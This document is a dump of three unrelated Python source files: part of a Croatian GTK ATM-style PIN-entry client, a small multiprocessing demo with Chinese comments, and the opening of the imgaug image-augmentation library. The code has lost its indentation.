def isAccountSelected(self):
index = self.cbxAccountNum.get_active()
if index == 0:
return False
else:
return True
def on_infoWindow2_activate_default(self, data=None):
self.response = self.infoWindow2.show()
self.infoWindow2.hide()
def on_hideInfoWindow2_clicked(self, object):
self.infoWindow2.hide()
def on_infoWindow_activate_default(self, data=None):
self.response = self.infoWindow.show()
self.infoWindow.hide()
def on_gtk_about_activate(self, menuitem, data=None):
self.response = self.aboutDialog.run()
#self.response = self.infoWindow.show()
self.aboutDialog.hide()
def on_window1_destroy(self, object, data=None):
Gtk.main_quit()
def on_btnZero_clicked(self, object):
self.inputPin.insert_text("0", position = -1)
def on_btnOne_clicked(self, object):
self.inputPin.insert_text("1", position = -1)
def on_btnTwo_clicked(self, object):
self.inputPin.insert_text("2", position = -1)
def on_btnThree_clicked(self, object):
self.inputPin.insert_text("3", position = -1)
def on_btnFour_clicked(self, object):
self.inputPin.insert_text("4", position = -1)
def on_btnFive_clicked(self, object):
self.inputPin.insert_text("5", position = -1)
def on_btnSix_clicked(self, object):
self.inputPin.insert_text("6", position = -1)
def on_btnSeven_clicked(self, object):
self.inputPin.insert_text("7", position = -1)
def on_btnEight_clicked(self, object):
self.inputPin.insert_text("8", position = -1)
def on_btnNine_clicked(self, object):
self.inputPin.insert_text("9", position = -1)
def on_btnReset_clicked(self, object):
self.inputPin.set_text("")
self.statusLabel.set_text("Umetnite\nkarticu")
self.btnConfirm.set_sensitive(False)
self.cbxAccountNum.set_active(0)
#client.close()
#Umetnuta kartica
def on_cbxAccountNum_changed(self, object):
print "Racun odabran."
if self.isAccountSelected():
start_new_thread(self.getFaceImages,(0,))
def on_btnConfirm_clicked(self, object):
if self.inputPin.get_text_length() == 4:
self.sendPIN()
#client.close()
def on_gtk_quit_activate(self, menuitem, data=None):
Gtk.main_quit()
def __init__(self):
self.gladefile = "gui.glade"
self.builder = Gtk.Builder()
self.builder.add_from_file(self.gladefile)
self.builder.connect_signals(self)
#definiranje prozora
self.mainWindow = self.builder.get_object("mainWindow")
self.aboutDialog = self.builder.get_object("aboutDialog")
self.infoWindow = self.builder.get_object("infoWindow")
self.infoWindow2 = self.builder.get_object("infoWindow2")
#definiranje elemenata gui-a
self.statusLabel = self.builder.get_object("statusLabel")
self.inputPin = self.builder.get_object("inputPin")
self.cbxAccountNum = self.builder.get_object("cbxAccountNum")
self.btnOne = self.builder.get_object("btnOne")
self.btnTwo = self.builder.get_object("btnTwo")
self.btnThree = self.builder.get_object("btnThree")
self.btnFour = self.builder.get_object("btnFour")
self.btnFive = self.builder.get_object("btnFive")
self.btnSix = self.builder.get_object("btnSix")
self.btnSeven = self.builder.get_object("btnSeven")
self.btnEight = self.builder.get_object("btnEight")
self.btnNine = self.builder.get_object("btnNine")
self.btnZero = self.builder.get_object("btnZero")
self.btnReset = self.builder.get_object("btnReset")
self.btnConfirm = self.builder.get_object("btnConfirm")
#infowindow
self.infoTitle = self.builder.get_object("infoTitle")
self.infoText = self.builder.get_object("infoText")
#infowindow2
self.infoTitle2 = self.builder.get_object("infoTitle2")
self.infoText2 = self.builder.get_object("infoText2")
#Popunjavanje comboboxa
self.store = self.builder.get_object("accNums")
self.cbxAccountNum.set_model(self.store)
self.cell = Gtk.CellRendererText()
self.cbxAccountNum.pack_start(self.cell, True)
self.cbxAccountNum.add_attribute(self.cell, 'text', 0)
self.cbxAccountNum.set_active(0)
self.btnConfirm.set_sensitive(False)
#Prikazivanje glavnog prozora
self.mainWindow.show()
if __name__ == "__main__":
#Spajanje na autentikacijski server
try:
client.connect(ADDR)
except socket.error as msg:
print "Nemogucnost spajanja na autentikacijski server. Error: " + str(msg[0]) + " Poruka: " + msg[1]
exit()
GObject.threads_init()
main = GUI()
Gtk.main()
|
process_attr.py | """
进程模块使用,基础示例
"""
# 不能选带横线的
from multiprocessing import Process
from time import sleep
a = 1
# 进程执行函数
def fun():
print("开始运行第一个进程")
print(p.is_alive())
sleep(2)
print("第一个进程结束")
# print(p.is_alive())
# 实例化进程对象
p = Process(target=fun, name="Aid",daemon=True)
p.start()
print("第二个进程开始运行")
sleep(1)
print("第二个进程结束")
print(p.name)
print(p.pid)
print(p.is_alive())
|
imgaug.py | from __future__ import print_function, division, absolute_import
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc, ndimage
import multiprocessing
import threading
import sys
import six
import six.moves as sm
import os
from skimage import draw
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Empty as QueueEmpty
elif sys.version_info[0] == 3:
import pickle
from queue import Empty as QueueEmpty
xrange = range
ALL = "ALL"
# filepath to the quokka image
QUOKKA_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"quokka.jpg"
)
DEFAULT_FONT_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"DejaVuSans.ttf"
)
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
"""
Checks whether a variable is a numpy array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy array. Otherwise False.
"""
# using np.generic here seems to also fire for scalar numpy values even
# though those are not arrays
#return isinstance(val, (np.ndarray, np.generic))
return isinstance(val, np.ndarray)
def is_single_integer(val):
"""
Checks whether a variable is an integer.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an integer. Otherwise False.
"""
return isinstance(val, numbers.Integral)
def is_single_float(val):
"""
Checks whether a variable is a float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a float. Otherwise False.
"""
return isinstance(val, numbers.Real) and not is_single_integer(val)
def is_single_number(val):
"""
Checks whether a variable is a number, i.e. an integer or float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a number. Otherwise False.
"""
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
"""
Checks whether a variable is iterable.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an iterable. Otherwise False.
"""
# TODO make this more abstract, not just restricted to tuple/list
return isinstance(val, (tuple, list))
# TODO convert to is_single_string() or rename is_single_integer/float/number()
def is_string(val):
"""
Checks whether a variable is a string.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a string. Otherwise False.
"""
return isinstance(val, six.string_types)
def is_integer_array(val):
"""
Checks whether a variable is a numpy integer array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy integer array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.integer)
def is_callable(val):
"""
Checks whether a variable is a callable, e.g. a function.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a callable. Otherwise False.
"""
# python 3.x with x <= 2 does not support callable(), apparently
if sys.version_info[0] == 3 and sys.version_info[1] <= 2:
return hasattr(val, '__call__')
else:
return callable(val)
def seed(seedval):
"""
Set the seed used by the global random state and thereby all randomness
in the library.
This random state is by default by all augmenters. Under special
circumstances (e.g. when an augmenter is switched to deterministic mode),
the global random state is replaced by another -- local -- one.
The replacement is dependent on the global random state.
Parameters
----------
seedval : int
The seed to
use.
"""
CURRENT_RANDOM_STATE.seed(seedval)
def current_random_state():
"""
Returns the current/global random state of the library.
Returns
----------
out : np.random.RandomState
The current/global random state.
"""
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
"""
Returns a new random state.
Parameters
----------
seed : None or int, optional(default=None)
Optional seed value to use.
The same datatypes are allowed as for np.random.RandomState(seed).
fully_random : bool, optional(default=False)
Whether to use numpy's random initialization for the
RandomState (used if set to True). If False, a seed is sampled from
the global random state, which is a bit faster and hence the default.
Returns
-------
out : np.random.RandomState
The new random state.
"""
if seed is None:
if not fully_random:
# sample manually a seed instead of just RandomState(),
# because the latter one
# is way slower.
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
"""
Returns a dummy random state that is always based on a seed of 1.
Returns
-------
out : np.random.RandomState
The new random state.
"""
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
"""
Creates a copy of a random state.
Parameters
----------
random_state : np.random.RandomState
The random state to
copy.
force_copy : bool, optional(default=False)
If True, this function will always create a copy of every random
state. If False, it will not copy numpy's default random state,
but all other random states.
Returns
-------
rs_copy : np.random.RandomState
The copied random state.
"""
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
def derive_random_state(random_state):
return derive_random_states(random_state, n=1)[0]
# TODO use this everywhere instead of manual seed + create
def derive_random_states(random_state, n=1):
seed = random_state.randint(0, 10**6, 1)[0]
return [new_random_state(seed+i) for i in sm.xrange(n)]
def forward_random_state(random_state):
random_state.uniform()
# TODO
# def from_json(json_str):
# pass
def quokka(size=None):
"""
Returns an image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
if size is not None:
img = misc.imresize(img, size)
return img
def quokka_square(size=None):
"""
Returns an (square) image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
img = img[0:643, 0:643]
if size is not None:
img = misc.imresize(img, size)
return img
def angle_between_vectors(v1, v2):
"""
Returns the angle in radians between vectors 'v1' and 'v2'.
From http://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python
Parameters
----------
{v1, v2} : (N,) ndarray
Input
vectors.
Returns
-------
out : float
Angle in radians.
Examples
--------
>>> angle_between((1, 0, 0), (0, 1, 0))
1.5707963267948966
>>> angle_between((1, 0, 0), (1, 0, 0))
0.0
>>> angle_between((1, 0, 0), (-1, 0, 0))
3.141592653589793
"""
v1_u = v1 / np.linalg.norm(v1)
v2_u = v2 / np.linalg.norm(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def draw_text(img, y, x, text, color=[0, 255, 0], size=25): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw text on an image.
This uses by default DejaVuSans as its font, which is included in the
library.
Parameters
----------
img : (H,W,3) ndarray
The image array to draw text on.
Expected to be of dtype uint8 or float32 (value range 0.0 to 255.0).
{y, x} : int
x- and y- coordinate of the top left corner of the
text.
color : iterable of 3 ints, optional(default=[0, 255, 0])
Color of the text to draw. For RGB-images this is expected to be
an RGB color.
size : int, optional(default=25)
Font size of the text to
draw.
Returns
-------
img_np : (H,W,3) ndarray
Input image with text drawn on it.
"""
# keeping PIL here so that it is not a dependency of the library right now
from PIL import Image, ImageDraw, ImageFont
do_assert(img.dtype in [np.uint8, np.float32])
input_dtype = img.dtype
if img.dtype == np.float32:
img = img.astype(np.uint8)
for i in range(len(color)):
val = color[i]
if isinstance(val, float):
val = int(val * 255)
val = np.clip(val, 0, 255)
color[i] = val
img = Image.fromarray(img)
font = ImageFont.truetype(DEFAULT_FONT_FP, size)
context = ImageDraw.Draw(img)
context.text((x, y), text, fill=tuple(color), font=font)
img_np = np.asarray(img)
img_np.setflags(write=True) # PIL/asarray returns read only array
if img_np.dtype != input_dtype:
img_np = img_np.astype(input_dtype)
return img_np
def imresize_many_images(images, sizes=None, interpolation=None):
"""
Resize many images to a specified size.
Parameters
----------
images : (N,H,W,C) ndarray
Array of the images to resize.
Expected to usually be of dtype uint8.
sizes : iterable of two ints
The new size in (height, width)
format.
interpolation : None or string or int, optional(default=None)
The interpolation to use during resize.
If int, then expected to be one of:
* cv2.INTER_NEAREST (nearest neighbour interpolation)
* cv2.INTER_LINEAR (linear interpolation)
* cv2.INTER_AREA (area interpolation)
* cv2.INTER_CUBIC (cubic interpolation)
If string, then expected to be one of:
* "nearest" (identical to cv2.INTER_NEAREST)
* "linear" (identical to cv2.INTER_LINEAR)
* "area" (identical to cv2.INTER_AREA)
* "cubic" (identical to cv2.INTER_CUBIC)
If None, the interpolation will be chosen automatically. For size
increases, area interpolation will be picked and for size decreases,
linear interpolation will be picked.
Returns
-------
result : (N,H',W',C) ndarray
Array of the resized images.
"""
s = images.shape
do_assert(len(s) == 4, s)
nb_images = s[0]
im_height, im_width = s[1], s[2]
nb_channels = s[3]
height, width = sizes[0], sizes[1]
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
do_assert(ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC])
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
elif ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
else:
raise Exception("Invalid interpolation order")
result = np.zeros((nb_images, height, width, nb_channels), dtype=np.uint8)
for img_idx in sm.xrange(nb_images):
# TODO fallback to scipy here if image isn't uint8
result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img
return result
def imresize_single_image(image, sizes, interpolation=None):
"""
Resizes a single image.
Parameters
----------
image : (H,W,C) ndarray or (H,W) ndarray
Array of the image to resize.
Expected to usually be of dtype uint8.
sizes : iterable of two ints
See `imresize_many_images()`.
interpolation : None or string or int, optional(default=None)
See `imresize_many_images()`.
Returns
-------
out : (H',W',C) ndarray or (H',W') ndarray
The resized image.
"""
grayscale = False
if image.ndim == 2:
grayscale = True
image = image[:, :, np.newaxis]
do_assert(len(image.shape) == 3, image.shape)
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
def draw_grid(images, rows=None, cols=None):
"""
Converts multiple input images into a single image showing them in a grid.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
The input images to convert to a grid.
Expected to be RGB and have dtype uint8.
rows : None or int, optional(default=None)
The number of rows to show in the grid.
If None, it will be automatically derived.
cols : None or int, optional(default=None)
The number of cols to show in the grid.
If None, it will be automatically derived.
Returns
-------
grid : (H',W',3) ndarray
Image of the generated grid.
"""
if is_np_array(images):
do_assert(images.ndim == 4)
else:
do_assert(is_iterable(images) and is_np_array(images[0]) and images[0].ndim == 3)
nb_images = len(images)
do_assert(nb_images > 0)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
do_assert(len(channels) == 1, "All images are expected to have the same number of channels, but got channel set %s with length %d instead." % (str(channels), len(channels)))
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
do_assert(rows * cols >= nb_images)
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels), dtype=np.uint8)
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
def show_grid(images, rows=None, cols=None):
"""
Converts the input images to a grid image and shows it in a new window.
This function wraps around scipy.misc.imshow(), which requires the
`see <image>` command to work. On Windows systems, this tends to not be
the case.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
See `draw_grid()`.
rows : None or int, optional(default=None)
See `draw_grid()`.
cols : None or int, optional(default=None)
See `draw_grid()`.
"""
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
def do_assert(condition, message="Assertion failed."):
"""
Function that behaves equally to an `assert` statement, but raises an
Exception.
This is added because `assert` statements are removed in optimized code.
It replaces `assert` statements throughout the library that should be
kept even in optimized code.
Parameters
----------
condition : bool
If False, an exception is raised.
message : string, optional(default="Assertion failed.")
Error message.
"""
if not condition:
raise AssertionError(str(message))
class HooksImages(object):
"""
Class to intervene with image augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
Parameters
----------
activator : None or callable, optional(default=None)
A function that gives permission to execute an augmenter.
The expected interface is
`f(images, augmenter, parents, default)`,
where `images` are the input images to augment, `augmenter` is the
instance of the augmenter to execute, `parents` are previously
executed augmenters and `default` is an expected default value to be
returned if the activator function does not plan to make a decision
for the given inputs.
propagator : None or callable, optional(default=None)
A function that gives permission to propagate the augmentation further
to the children of an augmenter. This happens after the activator.
In theory, an augmenter may augment images itself (if allowed by the
activator) and then execute child augmenters afterwards (if allowed by
the propagator). If the activator returned False, the propagation step
will never be executed.
The expected interface is
`f(images, augmenter, parents, default)`,
with all arguments having identical meaning to the activator.
preprocessor : None or callable, optional(default=None)
A function to call before an augmenter performed any augmentations.
The interface is
`f(images, augmenter, parents)`,
with all arguments having identical meaning to the activator.
It is expected to return the input images, optionally modified.
postprocessor : None or callable, optional(default=None)
A function to call after an augmenter performed augmentations.
The interface is the same as for the preprocessor.
Examples
--------
>>> seq = iaa.Sequential([
>>> iaa.GaussianBlur(3.0, name="blur"),
>>> iaa.Dropout(0.05, name="dropout"),
>>> iaa.Affine(translate_px=-5, name="affine")
>>> ])
>>>
>>> def activator(images, augmenter, parents, default):
>>> return False if augmenter.name in ["blur", "dropout"] else default
>>>
>>> seq_det = seq.to_deterministic()
>>> images_aug = seq_det.augment_images(images)
>>> heatmaps_aug = seq_det.augment_images(
>>> heatmaps,
>>> hooks=ia.HooksImages(activator=activator)
>>> )
This augments images and their respective heatmaps in the same way.
The heatmaps however are only modified by Affine, not by GaussianBlur or
Dropout.
"""
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
def is_activated(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may be executed.
Returns
-------
out : bool
If True, the augmenter may be executed. If False, it may
not be executed.
"""
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may call its children to augment an
image. This is independent of the augmenter itself possible changing
the image, without calling its children. (Most (all?) augmenters with
children currently dont perform any changes themselves.)
Returns
-------
out : bool
If True, the augmenter may be propagate to its children.
If False, it may not.
"""
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
def preprocess(self, images, augmenter, parents):
"""
A function to be called before the augmentation of images starts (per
augmenter).
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
"""
A function to be called after the augmentation of images was
performed.
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksKeypoints(HooksImages):
"""
Class to intervene with keypoint augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class Keypoint(object):
"""
A single keypoint (aka landmark) on an image.
Parameters
----------
x : number
Coordinate of the keypoint on the x axis.
y : number
Coordinate of the keypoint on the y axis.
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
@property
def x_int(self):
return int(round(self.x))
@property
def y_int(self):
return int(round(self.y))
def project(self, from_shape, to_shape):
"""
Project the keypoint onto a new position on a new image.
E.g. if the keypoint is on its original image at x=(10 of 100 pixels)
and y=(20 of 100 pixels) and is projected onto a new image with
size (width=200, height=200), its new position will be (20, 40).
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = (self.x / from_width) * to_width
y = (self.y / from_height) * to_height
return Keypoint(x=x, y=y)
def shift(self, x, y):
"""
Move the keypoint around on an image.
Parameters
----------
x : number
Move by this value on the x axis.
y : number
Move by this value on the y axis.
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%.8f, y=%.8f)" % (self.x, self.y)
class KeypointsOnImage(object):
"""
Object that represents all keypoints on a single image.
Parameters
----------
keypoints : list of Keypoint
List of keypoints on the image.
shape : tuple of int
The shape of the image on which the keypoints are placed.
Examples
--------
>>> kps = [Keypoint(x=10, y=20), Keypoint(x=34, y=60)]
>>> kps_oi = KeypointsOnImage(kps, shape=image.shape)
"""
def __init__(self, keypoints, shape):
#assert len(shape) == 3, "KeypointsOnImage requires shape tuples of form (H, W, C) but got %s. Use C=1 for 2-dimensional images." % (str(shape),)
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
"""
Project keypoints from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the keypoints are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : KeypointsOnImage
Object containing all projected keypoints.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw all keypoints onto a given image. Each keypoint is marked by a
square of a chosen color and size.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the keypoints.
This image should usually have the same shape as
set in KeypointsOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all keypoints. If a single int `C`, then that is
equivalent to (C,C,C).
size : int, optional(default=3)
The size of each point. If set to C, each square will have
size CxC.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any keypoint is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn keypoints.
"""
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y_int, keypoint.x_int
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width - 1)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height - 1)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%.8f, y=%.8f on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x, y):
"""
Move the keypoints around on an image.
Parameters
----------
x : number
Move each keypoint by this value on the x axis.
y : number
Move each keypoint by this value on the y axis.
Returns
-------
out : KeypointsOnImage
Keypoints after moving them.
"""
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
"""
Convert the coordinates of all keypoints in this object to
an array of shape (N,2).
Returns
-------
result : (N, 2) ndarray
Where N is the number of keypoints. Each first value is the
x coordinate, each second value is the y coordinate.
"""
result = np.zeros((len(self.keypoints), 2), np.float32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
"""
Convert an array (N,2) with a given image shape to a KeypointsOnImage
object.
Parameters
----------
coords : (N, 2) ndarray
Coordinates of N keypoints on the original image.
Each first entry (i, 0) is expected to be the x coordinate.
Each second entry (i, 1) is expected to be the y coordinate.
shape : tuple
Shape tuple of the image on which the keypoints are placed.
Returns
-------
out : KeypointsOnImage
KeypointsOnImage object that contains all keypoints from the array.
"""
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
def to_keypoint_image(self, size=1):
"""
Draws a new black image of shape (H,W,N) in which all keypoint coordinates
are set to 255.
(H=shape height, W=shape width, N=number of keypoints)
This function can be used as a helper when augmenting keypoints with
a method that only supports the augmentation of images.
Parameters
-------
size : int
Size of each (squared) point.
Returns
-------
image : (H,W,N) ndarray
Image in which the keypoints are marked. H is the height,
defined in KeypointsOnImage.shape[0] (analogous W). N is the
number of keypoints.
"""
do_assert(len(self.keypoints) > 0)
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
do_assert(size % 2 != 0)
sizeh = max(0, (size-1)//2)
for i, keypoint in enumerate(self.keypoints):
# TODO for float values spread activation over several cells
# here and do voting at the end
y = keypoint.y_int
x = keypoint.x_int
x1 = np.clip(x - sizeh, 0, width-1)
x2 = np.clip(x + sizeh + 1, 0, width-1)
y1 = np.clip(y - sizeh, 0, height-1)
y2 = np.clip(y + sizeh + 1, 0, height-1)
#if 0 <= y < height and 0 <= x < width:
# image[y, x, i] = 255
if x1 < x2 and y1 < y2:
image[y1:y2, x1:x2, i] = 128
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1, nb_channels=None): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Converts an image generated by `to_keypoint_image()` back to
an KeypointsOnImage object.
Parameters
----------
image : (H,W,N) ndarray
The keypoints image. N is the number of
keypoints.
if_not_found_coords : tuple or list or dict or None
Coordinates to use for keypoints that cannot be found in `image`.
If this is a list/tuple, it must have two integer values. If it
is a dictionary, it must have the keys "x" and "y". If this
is None, then the keypoint will not be added to the final
KeypointsOnImage object.
threshold : int
The search for keypoints works by searching for the argmax in
each channel. This parameters contains the minimum value that
the max must have in order to be viewed as a keypoint.
nb_channels : None or int
Number of channels of the image on which the keypoints are placed.
Some keypoint augmenters require that information.
If set to None, the keypoint's shape will be set
to `(height, width)`, otherwise `(height, width, nb_channels)`.
Returns
-------
out : KeypointsOnImage
The extracted keypoints.
"""
do_assert(len(image.shape) == 3)
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
do_assert(len(if_not_found_coords) == 2)
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
out_shape = (height, width)
if nb_channels is not None:
out_shape += (nb_channels,)
return KeypointsOnImage(keypoints, shape=out_shape)
def copy(self):
"""
Create a shallow copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "KeypointsOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO functions: square(), to_aspect_ratio(), extend()/add_border(), contains_point()
class BoundingBox(object):
def __init__(self, x1, y1, x2, y2):
if x1 > x2:
x2, x1 = x1, x2
do_assert(x2 > x1)
if y1 > y2:
y2, y1 = y1, y2
do_assert(y2 > y1)
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
@property
def x1_int(self):
return int(round(self.x1))
@property
def y1_int(self):
return int(round(self.y1))
@property
def x2_int(self):
return int(round(self.x2))
@property
def y2_int(self):
